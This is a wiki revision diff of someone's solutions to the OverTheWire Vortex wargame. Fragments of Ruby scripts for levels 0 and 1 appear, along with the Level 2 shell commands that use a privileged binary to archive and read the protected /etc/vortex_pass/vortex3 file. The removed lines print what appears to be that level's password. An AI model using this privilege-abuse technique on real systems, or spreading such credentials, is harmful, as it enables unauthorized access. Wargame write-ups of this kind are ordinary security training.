Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision
Previous revision
security:over_the_wire:vortex [14 years ago - 2011/10/21 20:33] aogailsecurity:over_the_wire:vortex [14 years ago - 2011/10/21 20:43] (current) aogail
Line 3: Line 3:
 ===== Level 0 ===== ===== Level 0 =====
  
-<code ruby>+<code ruby level0.rb>
 require 'socket' require 'socket'
  
Line 18: Line 18:
 ===== Level 1 ===== ===== Level 1 =====
  
-<code ruby>+<code ruby level1.rb>
 require 'pty' require 'pty'
    
Line 45: Line 45:
 ===== Level 2 ===== ===== Level 2 =====
  
-<code shell+<code bash
-vortex2@games ~ $ /vortex/level2 /etc/vortex_pass/vortex3 +/vortex/level2 /etc/vortex_pass/vortex3 
-/bin/tar: Removing leading `/from member names +cat '/tmp/ownership.$$.tar'
-vortex2@games ~ $ ls -l /tmp/ownership.\$\$.tar +
--rw-r--r-- 1 vortex3 vortex2 10240 Oct 21 20:50 /tmp/ownership.$$.tar +
-vortex2@games ~ $ cat !$ +
-cat /tmp/ownership.\$\$.tar +
-etc/vortex_pass/vortex30000600000077100007710000000001210035360064015333 0ustar  vortex3vortex364ncXTvx#+
 </code> </code>